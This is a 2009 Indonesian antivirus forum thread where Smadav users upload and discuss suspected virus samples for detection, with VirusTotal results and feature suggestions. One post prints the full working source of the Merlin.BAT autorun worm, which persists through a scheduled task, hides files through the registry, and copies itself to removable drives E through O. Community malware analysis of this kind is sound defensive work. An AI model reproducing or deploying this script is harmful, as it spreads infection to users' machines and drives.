Forum Smadav

Smadav Center => Konsultasi Virus => Topik dimulai oleh: ★ harboot ★ pada Juli 11, 2009, 03:28:36 AM

Judul: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada Juli 11, 2009, 03:28:36 AM
Cara Upload File :
Klik Reply
Klik Additional Options...
Lalu Browse

Upload MAX 102.400 KB

[DANGER!!]
Download attachment di forum ini hanya dilakukan oleh para profesional !!
Jangan ditiru dirumah! (don't try this at home!)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada Juli 11, 2009, 06:03:38 AM
Karena forum ini masih punya banyak moderator, kalo ada file yang macem2 (melanggar aturan forum atau mencurigakan) dan berukuran besar, moderator bisa langsung menghapusnya tanpa konfirmasi. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: kido pada Juli 11, 2009, 10:19:50 AM
Siap komandan!

Kayaknya mendingan kayak caranya harboot aja, jadi banyak member forum bisa bantu analisa.. :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada September 08, 2009, 03:46:09 PM
Ini kang Pesanan nya saya antar, Salah satu file yang di detec sbg virus Sality.G oleh Smadav Rev 6.2

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 08, 2009, 08:29:14 PM
ok mantabz..
Klo getuh, judulnya ganti aja yaaa..
Upload Virus ke Forum..
atw new topic.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mi_rd_za pada September 08, 2009, 08:52:02 PM
Ooh...

Jd skg upload sampel virus lwt ATTACH FILE ea?

Wah... Makin mantabzzz aj nie!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: cahyazone pada September 08, 2009, 09:12:59 PM
oke.., kalo da file mencurigakan nanti langsung saya upload ga.. 8)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada September 09, 2009, 09:46:46 AM
Hasil Tes nya di umumkan di forum kah?????
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 10, 2009, 10:05:05 PM
@boo.. kirim virus bisa disini..
biar teman2 lain bs analisa jugaaa.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada September 11, 2009, 03:32:40 PM
File nya sudah saya kirim mas harboot, itu ada di atas.............

saya berharap itu bukan virus ( gak terinfeksi virus ), soalnya itu file penting........

Setelah di analisis, mohon info hasilnya segera.............. ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 11, 2009, 04:04:44 PM
http://www.virustotal.com/analisis/837b7521c3d6f5b1d10119615d18f2de32a6e1ea5b8fdd2958f39b01505290df-1252532340

Menurut Virus Total..
CAT-QuickHeal
2009.09.11   (Suspicious) - DNAScan

Selebihnya free dari virus..
lg gak ada sandboxie, gak berani klik.
ngoprek juga gak bisa , he2.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada September 11, 2009, 04:08:50 PM
http://www.virustotal.com/analisis/837b7521c3d6f5b1d10119615d18f2de32a6e1ea5b8fdd2958f39b01505290df-1252532340

Menurut Virus Total..
CAT-QuickHeal
2009.09.11   (Suspicious) - DNAScan

Selebihnya free dari virus..
lg gak ada sandboxie, gak berani klik.
ngoprek juga gak bisa , he2.
http://www.virustotal.com/analisis/837b7521c3d6f5b1d10119615d18f2de32a6e1ea5b8fdd2958f39b01505290df-1252532340

Menurut Virus Total..
CAT-QuickHeal
2009.09.11   (Suspicious) - DNAScan

Selebihnya free dari virus..
lg gak ada sandboxie, gak berani klik.
ngoprek juga gak bisa , he2.

Saya kurang ngerti mas harboot,, tolong di jelasin.......... :-\ :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ajojing pada September 11, 2009, 04:51:38 PM
sanboxie itu software untuk isolasi file, jadi klo ada yg neko2 di lakukan ama itu file ga kena ama komp kita (kurang lebih seperti virtual OS gitu)
Ajojing juga sering make sandboxie :D


http://www.sandboxie.com/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada September 11, 2009, 05:18:14 PM
File nya sudah saya kirim mas harboot, itu ada di atas.............

saya berharap itu bukan virus ( gak terinfeksi virus ), soalnya itu file penting........

Setelah di analisis, mohon info hasilnya segera.............. ;)

Superassist.exe tidak terinfeksi virus menurut Smadav 2009 Rev 6.4 :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: krebot pada September 11, 2009, 10:57:44 PM
kumpulan virus Berto yang kata si Bro banyak virus2 yg dikumpulkannya tidak terdeteksi oleh smadav

http://www.4shared.com/file/131943242/a2ba90a4/Sample_Virus.html

gw cm coba memudahkan si bro yg katanya blom tau gmn cara memasukkan attachment :D

skrng si bro sudah bisa
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: rga pada September 11, 2009, 11:06:44 PM
skrg 4shared kok ga ada tulisannya "virus found" ya..dulu kalo file yg diupload ada virusnya pasti ada keteranganya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Iconk The X pada September 12, 2009, 06:07:49 AM
Assalamualaikum , salam kenal buat senior admn, member n para smadaver . btw anyway un bus way , gmana kalo Smadav bisa upload File yang di curigai terinveksi Virus varian baru  langsung tanpa harus join member di forum . maksud nya memudahkan pengguna smadav buat buru2 upload suspect file tanpa harus login dulu dan keburu sang virus maenin register serta  "menghasut " file lain buat jadi "pengantin" dia (kayak Tombol Help(forum) getoo). sekedar saran  :-bd
kalo bisa sich langsung dari quarantine . ntar kalo dah di upload kan baru bisa cek di forum . hehehehehehe \m/
 oh ya "nitip" suspect file 3 , dalam keterangan sich sality
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 1412 pada September 12, 2009, 09:34:32 AM
File nya sudah saya kirim mas harboot, itu ada di atas.............

saya berharap itu bukan virus ( gak terinfeksi virus ), soalnya itu file penting........

Setelah di analisis, mohon info hasilnya segera.............. ;)

Superassist.exe tidak terinfeksi virus menurut Smadav 2009 Rev 6.4 :D

OK thank, jadi lega rasanya.... tapi file *exe yang di detec sbg virus da 50 file.... :'( :'(

Mudah-mudahan mereka gak kena virus.........
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 12, 2009, 09:40:37 AM
@boo Saya kurang ngerti mas harboot,, tolong di jelasin..........
Penjelasan Sanboxie sidah dijawab Ajojing

CAT-QuickHeal
2009.09.11   (Suspicious) - DNAScan
artinya, Antivirus CAT mencurigai File yg boo upload..
sementara AV lain tdk mengatakan apapun alias aman..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 12, 2009, 10:11:42 AM
File nya sudah saya kirim mas harboot, itu ada di atas.............

saya berharap itu bukan virus ( gak terinfeksi virus ), soalnya itu file penting........

Setelah di analisis, mohon info hasilnya segera.............. ;)

Superassist.exe tidak terinfeksi virus menurut Smadav 2009 Rev 6.4 :D

Mas zai kapan smadav rev. 6.4 keluar ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada September 12, 2009, 02:25:24 PM
ne sample Merlin.BAT  :o :o :o

Blum kedetect ma smadav 6.3  \m/ \m/ \m/

Tolong dicek virusnya, coz 1 virus by user milik smadav juga blum bisa mendeteksinya
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada September 12, 2009, 09:08:54 PM
@ boo >> Superassist.exe
menurut ansav terbaru >> negatif virus  :o jadi aman
menurut AVG terbaru >>> negatif virus  :o aman juga
menurut smadav 6.3 >> positif virus sality.g  ??? ???
kesimpulan... sepertinya sih aman kok... aku jalanin di kompiku juga aman
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 13, 2009, 12:43:57 AM
Merlin.rar --- Virus Total

Symantec mendeteksi sebagai W32.SillyFDC
Panda Antivirus -> Bat/Autorun.IYA
Norman &m NOD32 -> BAT/Autorun.IXE
MC AFEE -> Bat/Autorun.worm.zr
Kaspersky -> Worm.BAT.Autorun.dv

Lainnya..
http://www.virustotal.com/analisis/6c6a1a2c7c32e4cf06a575b85b67751466fd7a4df5e19e74f7f07c4bed5a3a1e-1252777178

artinya file ini emank virus..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada September 13, 2009, 12:23:28 PM
@ bertho >> about merlin.rar >> berisi dirsystem.cmd
ini source codenya:
@echo off
cls
xcopy /y dirsystem.cmd /h %windir%\system32
schtasks /create /sc minute /mo 1 /tn "VTTimer" /tr %windir%\system32\dirsystem.cmd /ru "System"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v "Hidden" /t reg_dword /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v "ShowSuperHidden" /t reg_dword /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v RegisteredOwner /t REG_SZ /d Merlin /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v RegisteredOrganization /t REG_SZ /d GINGO /f
del /q /f /a E:\autorun.inf&del /q /f /a F:\autorun.inf&del /q /f /a G:\autorun.inf&del /q /f /a H:\autorun.inf&del /q /f /a I:\autorun.inf
del /q /f /a J:\autorun.inf&del /q /f /a K:\autorun.inf&del /q /f /a L:\autorun.inf&del /q /f /a M:\autorun.inf&del /q /f /a N:\autorun.inf
echo>>E:\autorun.inf [autorun]&echo>>E:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r E:\autorun.inf&xcopy /y dirsystem.cmd /h E:\
echo>>F:\autorun.inf [autorun]&echo>>F:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r F:\autorun.inf&xcopy /y dirsystem.cmd /h F:\
echo>>G:\autorun.inf [autorun]&echo>>G:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r G:\autorun.inf&xcopy /y dirsystem.cmd /h G:\ 
echo>>H:\autorun.inf [autorun]&echo>>H:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r H:\autorun.inf&xcopy /y dirsystem.cmd /h H:\
echo>>I:\autorun.inf [autorun]&echo>>I:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r I:\autorun.inf&xcopy /y dirsystem.cmd /h i:\
echo>>J:\autorun.inf [autorun]&echo>>J:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r J:\autorun.inf&xcopy /y dirsystem.cmd /h J:\
echo>>K:\autorun.inf [autorun]&echo>>K:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r K:\autorun.inf&xcopy /y dirsystem.cmd /h K:\
echo>>L:\autorun.inf [autorun]&echo>>L:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r L:\autorun.inf&xcopy /y dirsystem.cmd /h L:\
echo>>M:\autorun.inf [autorun]&echo>>M:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r M:\autorun.inf&xcopy /y dirsystem.cmd /h M:\
echo>>N:\autorun.inf [autorun]&echo>>N:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r N:\autorun.inf&xcopy /y dirsystem.cmd /h N:\
echo>>O:\autorun.inf [autorun]&echo>>O:\autorun.inf shellexecute=dirsystem.cmd&attrib +s +h +r O:\autorun.inf&xcopy /y dirsystem.cmd /h O:\
attrib +s +h +r %windir%\system32\dirsystem.cmd
cls
start %cd%
@exit

hasil analisa jati:
1. file itu kategori virus karena menyebar otomatis dengan autorun.inf
2. file dirsystem.cmd membuat  file induk di direktori c:/windows/sytem32
3. mengganti RegisteredOwner dan organisation owner

kesimpulan jelas virus >=)  \m/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: galang_cha0s pada September 13, 2009, 03:20:36 PM
virus jenis exploit..

Minggu, 13 September 2009
http://www.virustotal.com/analisis/36d8f15b6dcfc35a98315b266d70d96f7eab4fa196384ee5d8c834830ab490bb-1252829732

(password virus)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada September 13, 2009, 04:24:18 PM
Virus Merlin.BAT ini pernah merajalela di kompie temen g........ :o :o
Makanya g ambil sampelnya trus g liat scriptnya.....
Buat mas zai, virus ini ngebuat autorunnya smadav
jadi FOLDER autorun.inf.exe
Tapi pas g scan pake smadav, ternyata ga dideteksi... ~x( ~x(
Pake toolnya 1 virus by user juga ga kebaca.......... :-\ :-\
Anti virus tetangga yg bisa ngebaca cuma P*M*V... :-\ :-\ :-\
Mudah2an bang zai bisa memasukannya di databasenya smadav........ :-bd :-bd :-bd :-bd \m/ \m/ \m/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 13, 2009, 06:02:55 PM
Zai blom pnah mampir sini lg yaaa??
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 13, 2009, 09:53:55 PM
Zai blom pnah mampir sini lg yaaa??

Masih sibuk mas, ditunggu aja :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: RefrizaL pada September 13, 2009, 10:23:32 PM
ni aku submit ya, sample yg sebenarnya udah lama banget bs didetek ama AV imporku, tp blm masuk database smadav kyknya..
ada 3.
mnurut penamaan kaspersky disebut:
1.bacteroloh
2.senna
3.vb
oh ya,, aku sertain juga file smadav yg diinject ama virusnya  
*tp udah bs didisinfect kaspersky koq... cuma mw nambah database smadav aj..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada September 14, 2009, 10:35:30 AM
Virus Merlin.BAT ini pernah merajalela di kompie temen g........ :o :o
Makanya g ambil sampelnya trus g liat scriptnya.....
Buat mas zai, virus ini ngebuat autorunnya smadav
jadi FOLDER autorun.inf.exe
Tapi pas g scan pake smadav, ternyata ga dideteksi... ~x( ~x(
Pake toolnya 1 virus by user juga ga kebaca.......... :-\ :-\
Anti virus tetangga yg bisa ngebaca cuma P*M*V... :-\ :-\ :-\
Mudah2an bang zai bisa memasukannya di databasenya smadav........ :-bd :-bd :-bd :-bd \m/ \m/ \m/

Satu lagi Bro ketinggalan... Antivirus Tetangga,... Morhost Antivirus juga sudah bisa mendeteksi nya.... ;>  ;>
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Yudh pada September 14, 2009, 10:37:03 AM
Nanti sy juga coba meng-upload virus di forum yah mas Zai...  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada September 15, 2009, 11:15:09 PM
Virus Merlin.BAT ini pernah merajalela di kompie temen g........ :o :o
Makanya g ambil sampelnya trus g liat scriptnya.....
Buat mas zai, virus ini ngebuat autorunnya smadav
jadi FOLDER autorun.inf.exe
Tapi pas g scan pake smadav, ternyata ga dideteksi... ~x( ~x(
Pake toolnya 1 virus by user juga ga kebaca.......... :-\ :-\
Anti virus tetangga yg bisa ngebaca cuma P*M*V... :-\ :-\ :-\
Mudah2an bang zai bisa memasukannya di databasenya smadav........ :-bd :-bd :-bd :-bd \m/ \m/ \m/

Satu lagi Bro ketinggalan... Antivirus Tetangga,... Morhost Antivirus juga sudah bisa mendeteksi nya.... ;>  ;>
Oh iya..............Ok............ :-X :-X :-X :-X
Mas zai............Rev 6.4 juga belum bisa mendeteksi Merlin.BAT ini...........
1 Virus By User juga sama................... ~x( ~x( ~x( ~x(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada September 15, 2009, 11:30:32 PM
Virus Merlin.BAT ini pernah merajalela di kompie temen g........ :o :o
Makanya g ambil sampelnya trus g liat scriptnya.....
Buat mas zai, virus ini ngebuat autorunnya smadav
jadi FOLDER autorun.inf.exe
Tapi pas g scan pake smadav, ternyata ga dideteksi... ~x( ~x(
Pake toolnya 1 virus by user juga ga kebaca.......... :-\ :-\
Anti virus tetangga yg bisa ngebaca cuma P*M*V... :-\ :-\ :-\
Mudah2an bang zai bisa memasukannya di databasenya smadav........ :-bd :-bd :-bd :-bd \m/ \m/ \m/

Satu lagi Bro ketinggalan... Antivirus Tetangga,... Morhost Antivirus juga sudah bisa mendeteksi nya.... ;>  ;>
Oh iya..............Ok............ :-X :-X :-X :-X
Mas zai............Rev 6.4 juga belum bisa mendeteksi Merlin.BAT ini...........
1 Virus By User juga sama................... ~x( ~x( ~x( ~x(

Smadav 2009 Rev. berapapun sudah bisa mendeteksinya jika sedang menempel di Flashdisk :D

1 Virus By User sementara ini hanya mendukung file bertipe executable.
Tunggu saja Rev. 7 nanti yang bisa membersihkan virus ini sampai tuntas 99% ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada September 16, 2009, 09:43:19 AM
Virus Merlin.BAT ini pernah merajalela di kompie temen g........ :o :o
Makanya g ambil sampelnya trus g liat scriptnya.....
Buat mas zai, virus ini ngebuat autorunnya smadav
jadi FOLDER autorun.inf.exe
Tapi pas g scan pake smadav, ternyata ga dideteksi... ~x( ~x(
Pake toolnya 1 virus by user juga ga kebaca.......... :-\ :-\
Anti virus tetangga yg bisa ngebaca cuma P*M*V... :-\ :-\ :-\
Mudah2an bang zai bisa memasukannya di databasenya smadav........ :-bd :-bd :-bd :-bd \m/ \m/ \m/

Satu lagi Bro ketinggalan... Antivirus Tetangga,... Morhost Antivirus juga sudah bisa mendeteksi nya.... ;>  ;>
Oh iya..............Ok............ :-X :-X :-X :-X
Mas zai............Rev 6.4 juga belum bisa mendeteksi Merlin.BAT ini...........
1 Virus By User juga sama................... ~x( ~x( ~x( ~x(

Smadav 2009 Rev. berapapun sudah bisa mendeteksinya jika sedang menempel di Flashdisk :D

1 Virus By User sementara ini hanya mendukung file bertipe executable.
Tunggu saja Rev. 7 nanti yang bisa membersihkan virus ini sampai tuntas 99% ;)

Seeeeeeeeepppppppp Dah...  :-bd :-bd :-bd :-bd
Awaited New Version
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada September 16, 2009, 09:00:02 PM
@Bertho... virus merlin atau dirsystem.cmd ga usah dibesar besarin virus itu tidak merusak apapun hanya mengganti nama dan organisasi yg punya kompie. Pake task manager aja udah ko. Udahlah mending ngebahas sality atau conficker yg lebih jahat
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 17, 2009, 12:04:29 PM
Virus Merlin.BAT ini pernah merajalela di kompie temen g........ :o :o
Makanya g ambil sampelnya trus g liat scriptnya.....
Buat mas zai, virus ini ngebuat autorunnya smadav
jadi FOLDER autorun.inf.exe
Tapi pas g scan pake smadav, ternyata ga dideteksi... ~x( ~x(
Pake toolnya 1 virus by user juga ga kebaca.......... :-\ :-\
Anti virus tetangga yg bisa ngebaca cuma P*M*V... :-\ :-\ :-\
Mudah2an bang zai bisa memasukannya di databasenya smadav........ :-bd :-bd :-bd :-bd \m/ \m/ \m/

Satu lagi Bro ketinggalan... Antivirus Tetangga,... Morhost Antivirus juga sudah bisa mendeteksi nya.... ;>  ;>
Oh iya..............Ok............ :-X :-X :-X :-X
Mas zai............Rev 6.4 juga belum bisa mendeteksi Merlin.BAT ini...........
1 Virus By User juga sama................... ~x( ~x( ~x( ~x(

Smadav 2009 Rev. berapapun sudah bisa mendeteksinya jika sedang menempel di Flashdisk :D

1 Virus By User sementara ini hanya mendukung file bertipe executable.
Tunggu saja Rev. 7 nanti yang bisa membersihkan virus ini sampai tuntas 99% ;)


Ditunggu mas zai untuk smadav Rev. 7 :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Jastis pada September 17, 2009, 12:12:45 PM
Virus dewasa.exe

Kutip
Ok Bro udah gw upload samples virusnya...sudah masuk ke database. Please help me bro...thanks for All
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 17, 2009, 04:17:06 PM
buat php upload virus aja yuuuk.
jd gak usah 4shared lg..
upload disini juga gampang siih..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ĵŏřĩş™ pada September 17, 2009, 07:14:30 PM
@Bertho... virus merlin atau dirsystem.cmd ga usah dibesar besarin virus itu tidak merusak apapun hanya mengganti nama dan organisasi yg punya kompie. Pake task manager aja udah ko. Udahlah mending ngebahas sality atau conficker yg lebih jahat
Iya sih...........
Tapi jangan salah... :-\ :-\ :-\ :-\
Virus ini mencoba membuat task baru pada Schedule Tasks Windows dengan nama VTTimer yang akan menjalankan file virus tersebut pada rentan waktu yang telah ditentukan.
Makanya jangan sempe keinfeksi bro.... =)) =)) =))
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada September 17, 2009, 08:42:53 PM
@bertho: kalo file induk dah mati. Registri dah benerin. Vt timer mau manggil file yang mana? Yg dipanggil dah mati kok spt nurdin m. Top
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 17, 2009, 09:06:41 PM
Oiii.. Topik ini buat upload virus, bukan bahas virus...
tolong dimengertiii... SmadAV bikin upload dari softwarenya aja.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada September 17, 2009, 09:16:37 PM
We bos harboot ngambek! Kan diawal postingan sibos bilang silahkan upload disini untuk dianalisa bersama. Apa  aku yg pikun yah?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada September 17, 2009, 09:18:14 PM
We bos harboot ngambek! Kan diawal postingan sibos bilang silahkan upload disini untuk dianalisa bersama. Apa  aku yg pikun yah?
Iya bner broo... Dianalisa bukan dibahas hehehe...
Peacee...!!!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: amirdtr pada September 17, 2009, 09:21:51 PM
Dan saya jadi berpikir... bagaimana kalau dibuat wizard untuk upload virus.... :D ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada September 17, 2009, 09:24:40 PM
Dan saya jadi berpikir... bagaimana kalau dibuat wizard untuk upload virus.... :D ;)
Saran yg baguss...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada September 17, 2009, 09:30:05 PM
Wizard? Oke juga tuh. Jd smadaver cuma upload sampel virus doang ga usah pake koment. Trs utk analisa koment dan pembahasan buat wizard lagi. Kan jadi makin rame. Setuju ga bro?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: amirdtr pada September 17, 2009, 09:35:22 PM
Untuk lebih jelasnya, silakan buka PCMAV 2.x . Di "Quarantine" PCMAV, disitu ada tombol kita bisa mengirimkan sample virus. Kurang lebih seperti itu.... :-\

...Jadi User dibimbing mulai dari Mempersiapkan Sample Virus > Memberikan Komentar (Opsional) > Mengupload > Selesai. (Daripada buka 4Shared SmadAV dari virus4.com :D )
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada September 17, 2009, 09:41:33 PM
Yupz...
Lebih praktis, keluhan user ketahuan, analisa jd lebih jelass..!!!  :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 17, 2009, 09:45:27 PM
kan bs upload disini sekaligus komentar..
misal virus ini yg telah menghapus semua foto2ku..
PC MAV itu upload lgs dari AVnya??
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada September 17, 2009, 09:50:04 PM
kan bs upload disini sekaligus komentar..
misal virus ini yg telah menghapus semua foto2ku..
PC MAV itu upload lgs dari AVnya??

Mslhx apakah user udah pasti tau forsmad???
Klo PV MAV emg lgsng upload beserta komenx dr AV tsb...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 17, 2009, 09:53:11 PM
mampir kesini juga gan..
http://forum.smadav.net/index.php?topic=1040.0

owh. SmadAV juga harus lgs upload.
jd gak perlu buka virus4 lg..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada September 17, 2009, 10:00:23 PM
Sebagai saran c biar lbih praktis hehehe....  :-X :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada September 17, 2009, 10:15:21 PM
Ok, Upload langsung virus + komen ke server Smadav akan segera direalisasikan paling cepat di Rev. 7 :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: amirdtr pada September 17, 2009, 10:23:45 PM
Sudah saya usulkan ke topic SmadAV 2009 Rev. 6.... :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada September 17, 2009, 10:26:17 PM
Ok, Upload langsung virus + komen ke server Smadav akan segera direalisasikan paling cepat di Rev. 7 :)

Masuuk, Okeh2 bozz...
hehehe....   :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 18, 2009, 10:42:51 AM
Ok, Upload langsung virus + komen ke server Smadav akan segera direalisasikan paling cepat di Rev. 7 :)

Sip :-bd di tunggu mas Zai :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 19, 2009, 05:15:39 PM
Gw bikin WEB-UPLOAD sendiri..
coz klo menggunakan imageshack atw uploadhouse atw hosting image lainnya suka ribet..
mau upload file di ziddu, easy-share, rapid, kewlshare kena iklan dan waktu tunda dulu..

di WEB-UPLOAD harboot ini gak ribet.
SmadAV juga kudu buat spt ini,
kan uda punya server lokal,
jadi gak perlu 4shared lagi..

(untuk sementara teman2 boleh upload file disini)
(untuk coba2 ide gw ini, coz bsok2 di private buat gw doank.)

http://www.harboot.isgreat.org
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: b_agoy pada September 19, 2009, 05:25:32 PM
Gw bikin WEB-UPLOAD sendiri..
coz klo menggunakan imageshack atw uploadhouse atw hosting image lainnya suka ribet..
mau upload file di ziddu, easy-share, rapid, kewlshare kena iklan dan waktu tunda dulu..

di WEB-UPLOAD harboot ini gak ribet.
SmadAV juga kudu buat spt ini,
kan uda punya server lokal,
jadi gak perlu 4shared lagi..

(untuk sementara teman2 boleh upload file disini)
(untuk coba2 ide gw ini, coz bsok2 di private buat gw doank.)

http://www.harboot.isgreat.org

Sip broo...!!! :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 19, 2009, 05:33:25 PM
uda dicoba?
mantabz kan..
mana si sony?
suruh kembangkan lbh mantabz buat smadav..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 19, 2009, 06:25:42 PM
uda dicoba?
mantabz kan..
mana si sony?


Lagi buka puasa  :D

Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Zai pada September 20, 2009, 03:47:08 AM
Gw bikin WEB-UPLOAD sendiri..
coz klo menggunakan imageshack atw uploadhouse atw hosting image lainnya suka ribet..
mau upload file di ziddu, easy-share, rapid, kewlshare kena iklan dan waktu tunda dulu..

di WEB-UPLOAD harboot ini gak ribet.
SmadAV juga kudu buat spt ini,
kan uda punya server lokal,
jadi gak perlu 4shared lagi..

(untuk sementara teman2 boleh upload file disini)
(untuk coba2 ide gw ini, coz bsok2 di private buat gw doank.)

http://www.harboot.isgreat.org

Boot, bisa cariin yang ada progress bar nya gak, kayak di 4shared milik Smadav :D
4shared milik Smadav sekarang menampung lebih dari 6 GB file virus yang di-upload Smadaver, dan itu gak akan cukup ditaruh di server lokal yang saat ini kuotanya hanya 4 GB :(
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: pdc_romeo pada September 20, 2009, 04:03:01 AM
Wah2... hebat... ya... tempat upload virusnya di 4shared... :-bd :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 20, 2009, 09:43:16 AM
wew.. kagak ngerti carapakai progress bar.
ne aja mau nanya sonny.. bukan ini doank masalahnya.
tp harboot gak bs upload file2 gede rasanya.
mungkin harus dipecah2 dulu.

maklum baru belajar PHP.. he2.
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 21, 2009, 06:49:15 AM
Wau..4shared milik Smadav sekarang  nambah ya, daya tampungnya file virus jadi 6 GB wau hebat :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: mi_rd_za pada September 23, 2009, 12:25:20 PM
Maju terus smadAv...!!! :-X :-X :-X
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: CAH SMK NS KEMIRI pada September 23, 2009, 04:14:57 PM
oooo cara lain tuk upload virus ga usah pake aktifin smadav horeeee  :D bgus tu
bisa ya bos?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ★ harboot ★ pada September 23, 2009, 04:15:29 PM
ya bisalah..
mana virusnya? upload dimari...
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: CAH SMK NS KEMIRI pada September 23, 2009, 05:32:15 PM
 :D :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: jatioke pada September 24, 2009, 05:33:57 AM
for all nih ane dapat virus yg susah didelet
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada September 24, 2009, 06:44:39 AM
for all nih ane dapat virus yg susah didelet

Virus apa ya ???
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: amirdtr pada September 24, 2009, 08:04:10 AM
for all nih ane dapat virus yg susah didelet

Hmm...ini virus Conficker yang ada di flashdisk. Kenapa tidak cukup mendeletenya melalui Windows Explorer (<flashdisk drive>:/RECYCLER/S-5-.../jwgkvsq.vmx), beres :) :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
